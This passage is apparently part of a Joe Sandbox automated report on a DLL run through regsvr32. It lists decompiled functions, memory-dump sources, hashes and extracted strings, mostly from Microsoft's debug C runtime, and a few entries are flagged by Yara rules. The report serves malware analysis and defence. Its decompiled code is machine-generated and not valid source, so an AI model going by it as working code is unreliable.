                                                      • Opcode Fuzzy Hash: 433987b36a956229ec77e0de1d2b7e358b1fb906a8f620ef815ae1dd4af6a87a
                                                      • Instruction Fuzzy Hash: 5A115E30A2D60286F3E0AB25ED4577DA6E1B784B60F215671E9EE422F5DB2FE4048611
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      C-Code - Quality: 50%
                                                      			E000007FE7FEF9D2461B(void* __rdx, void* __r8, long long _a32, long long _a40, intOrPtr _a64, long long _a72, void* _a80, intOrPtr _a88, long long _a96, long long _a128, signed int _a136, long long _a144, intOrPtr _a152, void* _a160) {
                                                      				signed int _t64;
                                                      				intOrPtr _t66;
                                                      				void* _t73;
                                                      				void* _t92;
                                                      				long long _t98;
                                                      				long long _t113;
                                                      				long long _t114;
                                                      				long long _t115;
                                                      				long long _t130;
                                                      				intOrPtr _t132;
                                                      				long long _t135;
                                                      
                                                      				if (_a136 == 1) goto 0xf9d24672;
                                                      				_t64 = _a136 & 0x0000ffff;
                                                      				if (_t64 == 2) goto 0xf9d24672;
                                                      				if (_a136 == 3) goto 0xf9d24672;
                                                      				_a40 = "Error: memory allocation: bad memory block type.\n";
                                                      				_a32 = "%s";
                                                      				r9d = 0;
                                                      				r8d = 0;
                                                      				0xf9d2ad00();
                                                      				if (_t64 != 1) goto 0xf9d24672;
                                                      				asm("int3");
                                                      				_t98 = _a128 + 0x34;
                                                      				_a96 = _t98;
                                                      				0xf9d2ac90(); // executed
                                                      				_a80 = _t98;
                                                      				if (_a80 != 0) goto 0xf9d246b8;
                                                      				if (_a160 == 0) goto 0xf9d246b3;
                                                      				 *_a160 = 0xc;
                                                      				goto 0xf9d248b4;
                                                      				_t66 =  *0xf9d4b03c; // 0x38
                                                      				 *0xf9d4b03c = _t66 + 1;
                                                      				if (_a64 == 0) goto 0xf9d2472d;
                                                      				 *_a80 = 0;
                                                      				 *((long long*)(_a80 + 8)) = 0;
                                                      				 *((long long*)(_a80 + 0x10)) = 0;
                                                      				 *((intOrPtr*)(_a80 + 0x18)) = 0xfedcbabc;
                                                      				 *((long long*)(_a80 + 0x20)) = _a128;
                                                      				 *(_a80 + 0x1c) = 3;
                                                      				 *((intOrPtr*)(_a80 + 0x28)) = 0;
                                                      				goto 0xf9d24844;
                                                      				if (0xffffffff -  *0xf9d4c960 - _a128 <= 0) goto 0xf9d24763;
                                                      				_t130 =  *0xf9d4c960; // 0x42cc
                                                      				 *0xf9d4c960 = _t130 + _a128;
                                                      				goto 0xf9d2476e;
                                                      				 *0xf9d4c960 = 0xffffffff;
                                                      				_t132 =  *0xf9d4c990; // 0xa0c
                                                      				 *0xf9d4c990 = _t132 + _a128;
                                                      				_t113 =  *0xf9d4c978; // 0x32f4
                                                      				_t92 =  *0xf9d4c990 - _t113; // 0xa0c
                                                      				if (_t92 <= 0) goto 0xf9d247a8;
                                                      				_t114 =  *0xf9d4c990; // 0xa0c
                                                      				 *0xf9d4c978 = _t114;
                                                      				if ( *0xf9d4c980 == 0) goto 0xf9d247c4;
                                                      				_t115 =  *0xf9d4c980; // 0x2363b00
                                                      				 *((long long*)(_t115 + 8)) = _a80;
                                                      				goto 0xf9d247d0;
                                                      				 *0xf9d4c968 = _a80;
                                                      				_t135 =  *0xf9d4c980; // 0x2363b00
                                                      				 *_a80 = _t135;
                                                      				 *((long long*)(_a80 + 8)) = 0;
                                                      				 *((long long*)(_a80 + 0x10)) = _a144;
                                                      				 *((intOrPtr*)(_a80 + 0x18)) = _a152;
                                                      				 *((long long*)(_a80 + 0x20)) = _a128;
                                                      				 *(_a80 + 0x1c) = _a136;
                                                      				_t78 = _a88;
                                                      				 *((intOrPtr*)(_a80 + 0x28)) = _a88;
                                                      				 *0xf9d4c980 = _a80;
                                                      				r8d = 4;
                                                      				E000007FE7FEF9D232B0( *0xf9d4b04c & 0x000000ff, _a88,  *0xf9d4b04c & 0x000000ff, _a80 + 0x2c, __rdx, __r8);
                                                      				_t145 = _a128;
                                                      				r8d = 4;
                                                      				E000007FE7FEF9D232B0( *0xf9d4b04c & 0x000000ff, _a88,  *0xf9d4b04c & 0x000000ff, _a80 + _a128 + 0x30, _a128, __r8);
                                                      				_t73 = E000007FE7FEF9D232B0( *0xf9d4b04f & 0x000000ff, _t78,  *0xf9d4b04f & 0x000000ff, _a80 + 0x30, _t145, _a128);
                                                      				_a72 = _a80 + 0x30;
                                                      				return E000007FE7FEF9D29360(_t73, 4);
                                                      			}















                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: _unlock
                                                      • String ID: Error: memory allocation: bad memory block type.
                                                      • API String ID: 2480363372-1537269110
                                                      • Opcode ID: 0e27953d906dd6213389af50a7459ab3260dce137a7056963e47b3559a26f049
                                                      • Instruction ID: 3c0f980f6ccd09ea8afc11027f8ae4c535623d5f1e7c019e481493293b97b3b1
                                                      • Opcode Fuzzy Hash: 0e27953d906dd6213389af50a7459ab3260dce137a7056963e47b3559a26f049
                                                      • Instruction Fuzzy Hash: 4B71EB36A09B8586DBA0CB59E89036EB7E0F3C9B90F218526DADD437A4DF7DD044CB40
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateProcess
                                                      • String ID: z
                                                      • API String ID: 963392458-1375040831
                                                      • Opcode ID: 044b6e1ce48cfd18270e48a4d1ffa5fa37b68dcc1aa27e33fe08f1a26b59e50a
                                                      • Instruction ID: 5490f85ef4092ec497088e60b932e525f0ce693db587fe3a551d92928695aba5
                                                      • Opcode Fuzzy Hash: 044b6e1ce48cfd18270e48a4d1ffa5fa37b68dcc1aa27e33fe08f1a26b59e50a
                                                      • Instruction Fuzzy Hash: 5141C27191C7848FD7A5DF18D08A7DAB7E0FB98318F01495DE88CC7292DB749885CB46
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateProcess
                                                      • String ID: z
                                                      • API String ID: 963392458-1375040831
                                                      • Opcode ID: 274a6825be770f02a4f82c9f6cbe831b28a77f7637ef6bb2e3a1323e28db6850
                                                      • Instruction ID: 90d0215384d3738c1bd812602d16852eefab8a4974bd8bae5625081230a7a3ff
                                                      • Opcode Fuzzy Hash: 274a6825be770f02a4f82c9f6cbe831b28a77f7637ef6bb2e3a1323e28db6850
                                                      • Instruction Fuzzy Hash: 4741377091CB848BD7B4DF18D08A7AAB7E0FB98315F10495EE88CC3252DB7498848B86
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: EncodePointer_initterm_e
                                                      • String ID: Y
                                                      • API String ID: 1618838664-1754117475
                                                      • Opcode ID: 24d3616295d43623420cef2980f0f4d1896d7dbbaf9113ec39dfe7d3f9684184
                                                      • Instruction ID: e2eda9ea6841371ef03f52dec0317b7f8d7542193ab5d09d46fee122be74aa2a
                                                      • Opcode Fuzzy Hash: 24d3616295d43623420cef2980f0f4d1896d7dbbaf9113ec39dfe7d3f9684184
                                                      • Instruction Fuzzy Hash: 1DE0C22190C042A7FAA1AB24ED453BE63E0B791344FA14231E2CD824B5EB2FF908CB11
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 62%
                                                      			E000007FE7FEF9D27540(long long __rax) {
                                                      				long long _v24;
                                                      				void* _t8;
                                                      				void* _t9;
                                                      
                                                      				_t16 = __rax;
                                                      				_t9 = E000007FE7FEF9D23D00(_t8); // executed
                                                      				_v24 = __rax;
                                                      				return E000007FE7FEF9D2CF20(E000007FE7FEF9D2CFB0(E000007FE7FEF9D2D450(E000007FE7FEF9D2D470(E000007FE7FEF9D2BD50(E000007FE7FEF9D2AB90(_t9, _v24), _v24), _v24), _v24), _v24), _t16, _v24);
                                                      			}







                                                      APIs
                                                        • Part of subcall function 000007FEF9D23D00: RtlEncodePointer.NTDLL ref: 000007FEF9D23D06
                                                      • _initp_misc_winsig.LIBCMTD ref: 000007FEF9D2757B
                                                      • _initp_eh_hooks.LIBCMTD ref: 000007FEF9D27585
                                                        • Part of subcall function 000007FEF9D2CF20: EncodePointer.KERNEL32(?,?,?,?,000007FEF9D2758A,?,?,?,?,?,?,000007FEF9D23D39), ref: 000007FEF9D2CF30
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: EncodePointer$_initp_eh_hooks_initp_misc_winsig
                                                      • String ID:
                                                      • API String ID: 2678799220-0
                                                      • Opcode ID: abe4bcf42024140c0e82e0fb2c3eff25659a698c9099ae3cd415aa6bcc21eafa
                                                      • Instruction ID: d1131ca10be328b200f0d94da683d71e83c9d45f094ccb2362bb8b9ac37f618d
                                                      • Opcode Fuzzy Hash: abe4bcf42024140c0e82e0fb2c3eff25659a698c9099ae3cd415aa6bcc21eafa
                                                      • Instruction Fuzzy Hash: CFE07D6391D58181E6B0BB21EC5226E93B0F7C8788F610171B6CD47A7BCE1DE9018B80
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: ExitProcess$AllocateHeap__crt
                                                      • String ID:
                                                      • API String ID: 4215626177-0
                                                      • Opcode ID: 77cc9cc60f8eca6ccffa51c036cc335ce9466cc401fd995fa093edd43c12ab32
                                                      • Instruction ID: 018cd22ed3aaffe80bc67b356604b0c029bcf26b5d2cff022e0890546f5cf117
                                                      • Opcode Fuzzy Hash: 77cc9cc60f8eca6ccffa51c036cc335ce9466cc401fd995fa093edd43c12ab32
                                                      • Instruction Fuzzy Hash: AFE04F2490898683E7A49726E80037D63E0FB84348F614036D7CE026F5CF2FE840E601
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 58%
                                                      			E000007FE7FEF9D24399(long long __rax, long long _a48, intOrPtr _a80, intOrPtr _a88, void* _a120) {
                                                      
                                                      				_a48 = __rax;
                                                      				if (_a48 == 0) goto 0xf9d243ad;
                                                      				goto 0xf9d243f5;
                                                      				if (_a88 != 0) goto 0xf9d243ce;
                                                      				if (_a120 == 0) goto 0xf9d243c7;
                                                      				 *_a120 = 0xc;
                                                      				goto 0xf9d243f5;
                                                      				if (E000007FE7FEF9D2ABB0(_a48, _a80) != 0) goto 0xf9d243f3;
                                                      				if (_a120 == 0) goto 0xf9d243ef;
                                                      				 *_a120 = 0xc;
                                                      				goto 0xf9d243f5;
                                                      				goto 0xf9d24377;
                                                      				return 0;
                                                      			}




                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1ac0a5da81333129a8f229358abc3f3628bfe7ae3225332448e9bf5308d83ad5
                                                      • Instruction ID: 1adc9abf0de1c3ca8893cd90e215b0d97e51771cadcbd8eff06287440f46b9d2
                                                      • Opcode Fuzzy Hash: 1ac0a5da81333129a8f229358abc3f3628bfe7ae3225332448e9bf5308d83ad5
                                                      • Instruction Fuzzy Hash: 8B01B332A5CB41C6F7A08A55E84472EA7E0F7C4794F321121AECD42BB8CB7DE440CA00
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: _ioterm
                                                      • String ID:
                                                      • API String ID: 4163092671-0
                                                      • Opcode ID: ccd1307e9d50970cca75b27b642d85769dad3e23086d7af9cb1c5234e8638c27
                                                      • Instruction ID: 7377a742d64af20529275359c4a94eabcf7c0d21081332a84b693dd33c507e1a
                                                      • Opcode Fuzzy Hash: ccd1307e9d50970cca75b27b642d85769dad3e23086d7af9cb1c5234e8638c27
                                                      • Instruction Fuzzy Hash: F4F03720C0C10789FAE16778AC0A37CA1D1A711B91F3252F5A0DC821F2D77FB54A8A12
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • _ioterm.LIBCMTD ref: 000007FEF9D23437
                                                        • Part of subcall function 000007FEF9D27D00: DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000007FEF9D2343C), ref: 000007FEF9D27D93
                                                        • Part of subcall function 000007FEF9D23E00: FlsFree.KERNEL32 ref: 000007FEF9D23E13
                                                        • Part of subcall function 000007FEF9D23E00: _mtdeletelocks.LIBCMTD ref: 000007FEF9D23E23
                                                        • Part of subcall function 000007FEF9D288D0: HeapDestroy.KERNELBASE ref: 000007FEF9D288DB
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: CriticalDeleteDestroyFreeHeapSection_ioterm_mtdeletelocks
                                                      • String ID:
                                                      • API String ID: 1508997487-0
                                                      • Opcode ID: bdb7225874b5496ab185c850c138daf46d614203cfe4a73cb1b8596e23d721ba
                                                      • Instruction ID: 18d5f63124407e78997e2f664e67049843f9c9ac3d7a6681d0ffcba3130af5de
                                                      • Opcode Fuzzy Hash: bdb7225874b5496ab185c850c138daf46d614203cfe4a73cb1b8596e23d721ba
                                                      • Instruction Fuzzy Hash: 50E06760E0C1439AF6D567B46C423BD91D06B54BC1FB245B2A1CE862F3EA5FB8014662
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: DestroyHeap
                                                      • String ID:
                                                      • API String ID: 2435110975-0
                                                      • Opcode ID: f7b981f9b1b51933cf7e1d9a1baddea90378982ce7575ce50583c327d4fc7a8e
                                                      • Instruction ID: df5636f5ee55eb5a1123ad47329e94e2a1af4504a4e9b44811c9c5941fd1bffd
                                                      • Opcode Fuzzy Hash: f7b981f9b1b51933cf7e1d9a1baddea90378982ce7575ce50583c327d4fc7a8e
                                                      • Instruction Fuzzy Hash: 6CC04C64D15A01C1EA445726FC8536822A06394745FA0C021C5CD012308B2F55968701
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: EncodePointer
                                                      • String ID:
                                                      • API String ID: 2118026453-0
                                                      • Opcode ID: 486166b47cec33101184f167bfa082c8d21519f5c79393c344b51e77eb7d9bd4
                                                      • Instruction ID: 5c830059afc01ab3dffeb0f702370a5898bb96dd38ab511ff450623a486f5942
                                                      • Opcode Fuzzy Hash: 486166b47cec33101184f167bfa082c8d21519f5c79393c344b51e77eb7d9bd4
                                                      • Instruction Fuzzy Hash: F1A00224F16591D7DAAC373A5D9713D11A06B68709FF05869C74F40261CE2F92FE8B05
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: _invoke_watson_if_error$DebugOutputString$_invoke_watson_if_oneof$_itow_s_snwprintf_s_unlock_wcsftime_l
                                                      • String ID: %s(%d) : %s$(*_errno())$, Line $<file unknown>$Assertion failed!$Assertion failed: $P$Second Chance Assertion Failed: File $_CrtDbgReport: String too long or IO Error$_CrtDbgReport: String too long or Invalid characters in String$_VCrtDbgReportW$_itow_s(nLine, szLineMessage, 4096, 10)$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgrptt.c$strcpy_s(szOutMessage2, 4096, "_CrtDbgReport: String too long or Invalid characters in String")$wcscat_s(szLineMessage, 4096, L"\n")$wcscat_s(szLineMessage, 4096, L"\r")$wcscat_s(szLineMessage, 4096, szUserMessage)$wcscpy_s(szLineMessage, 4096, szFormat ? L"Assertion failed: " : L"Assertion failed!")$wcscpy_s(szOutMessage, 4096, L"_CrtDbgReport: String too long or IO Error")$wcscpy_s(szUserMessage, 4096, L"_CrtDbgReport: String too long or IO Error")$wcstombs_s(&ret, szaOutMessage, 4096, szOutMessage, ((size_t)-1))$wcstombs_s(((void *)0), szOutMessage2, 4096, szOutMessage, ((size_t)-1))
                                                      • API String ID: 4197005980-4190456261
                                                      • Opcode ID: 4879bfb960a2721f9666c96030d6b34d6758162388cb50bc2d04b6b5102aed05
                                                      • Instruction ID: 631fc2af3d1e2e358681470289229c30ebeab24735d73449bcceef6109dc099e
                                                      • Opcode Fuzzy Hash: 4879bfb960a2721f9666c96030d6b34d6758162388cb50bc2d04b6b5102aed05
                                                      • Instruction Fuzzy Hash: 6B421031A0CA8685EBB0CB14E8547EE73E4F784345FA04226D6CD43AA9DF7EE549CB41
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: Pointer$Decode$AddressEncodeLibraryLoadProc
                                                      • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$USER32.DLL
                                                      • API String ID: 2256938910-232180764
                                                      • Opcode ID: 7f66a9951f4a4371a03f8907a7d8dae5388e10f0167802e39e15e0e0cc6986ee
                                                      • Instruction ID: c20bf9db26653c31616cb8f8a39641649b62d884e8934e9a70f617ae2971618d
                                                      • Opcode Fuzzy Hash: 7f66a9951f4a4371a03f8907a7d8dae5388e10f0167802e39e15e0e0cc6986ee
                                                      • Instruction Fuzzy Hash: 9A81C631A19B8686E7A09B19FC4436EB3E0F784755F608135DACE426B8DF7EE448CB41
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Client hook re-allocation failure at file %hs line %d.$Client hook re-allocation failure.$Error: memory allocation: bad memory block type.$Error: memory allocation: bad memory block type.Memory allocated at %hs(%d).$Error: possible heap corruption at or near 0x%p$Invalid allocation size: %Iu bytes.$Invalid allocation size: %Iu bytes.Memory allocated at %hs(%d).$The Block at 0x%p was allocated by aligned routines, use _aligned_realloc()$_CrtCheckMemory()$_CrtIsValidHeapPointer(pUserData)$_pFirstBlock == pOldBlock$_pLastBlock == pOldBlock$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgheap.c$fRealloc || (!fRealloc && pNewBlock == pOldBlock)$pOldBlock->nLine == IGNORE_LINE && pOldBlock->lRequest == IGNORE_REQ
                                                      • API String ID: 0-1181733849
                                                      • Opcode ID: 0b4b4e85d1eb3ae1a0b395440fade81dc617beeaf4b680a727513a857c3a72e7
                                                      • Instruction ID: c027552587c484905274aa3c7dfc2130a2bba284c4db387798f357193d3a2f5b
                                                      • Opcode Fuzzy Hash: 0b4b4e85d1eb3ae1a0b395440fade81dc617beeaf4b680a727513a857c3a72e7
                                                      • Instruction Fuzzy Hash: B3421035A0DB8685EBA08B69E88076E77E0F785794F214136DADD83BB4DB7ED440CB01
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      • _CrtIsValidHeapPointer(pUserData), xrefs: 000007FEF9D254E2
                                                      • f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgheap.c, xrefs: 000007FEF9D254F7, 000007FEF9D2556D, 000007FEF9D257FE
                                                      • HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer.Memory allocated at %hs(%d)., xrefs: 000007FEF9D2573C
                                                      • The Block at 0x%p was allocated by aligned routines, use _aligned_free(), xrefs: 000007FEF9D2542B
                                                      • HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer., xrefs: 000007FEF9D25683
                                                      • HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer., xrefs: 000007FEF9D2579F
                                                      • Client hook free failure., xrefs: 000007FEF9D254A0
                                                      • HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer.Memory allocated at %hs(%d)., xrefs: 000007FEF9D25620
                                                      • pHead->nLine == IGNORE_LINE && pHead->lRequest == IGNORE_REQ, xrefs: 000007FEF9D257E9
                                                      • _BLOCK_TYPE_IS_VALID(pHead->nBlockUse), xrefs: 000007FEF9D25558
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: HeapPointerValid_free_base
